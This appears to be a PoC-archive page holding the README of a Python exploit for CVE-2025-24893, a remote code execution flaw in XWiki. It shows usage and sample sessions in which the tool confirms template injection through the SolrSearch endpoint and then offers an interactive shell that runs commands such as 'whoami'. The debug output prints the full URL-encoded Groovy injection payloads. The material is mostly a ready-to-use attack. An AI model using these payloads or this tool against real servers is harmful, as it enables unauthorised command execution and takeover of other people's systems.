来源

关联漏洞

描述

This is a small script for the rce vulnerability for CVE-2025-24893. It supports basic input/output

介绍

## Infos

This PoC first tests for the SSTI and if it works.
It will go in loop and allows you to run commands remotly.

The `exec` and `shell` command do the same currently.

## Installation

```bash
python3 -m pip install requirements.txt
```

## Usage
### Connecting
```bash
python3 poc.py <target>
```

## Example
### With debug set to False (default)
```bash
python3 poc.py http://10.129.137.222:8080
[*] Targeting http://10.129.137.222:8080
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
xwiki
```

### With debug set to True
The debug flag at the top of the script will show you the generated urls.
It will create a debug.log file in which contains the raw response of the request.

```bash
python3 poc.py http://10.129.137.222:8080
[*] Targeting http://10.129.137.222:8080
[DEBUG] URL used: http://10.129.137.222:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22XWIKI_TEST_123%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
[DEBUG] URL used: http://10.129.137.222:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22whoami%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
xwiki
```

文件快照

 [4.0K]  /data/pocs/731250f444e5798c4112a166f7e64d436022cd35
├── [5.1K]  poc.py
├── [1.7K]  README.md
└── [  24]  requirements.txt

0 directories, 3 files

备注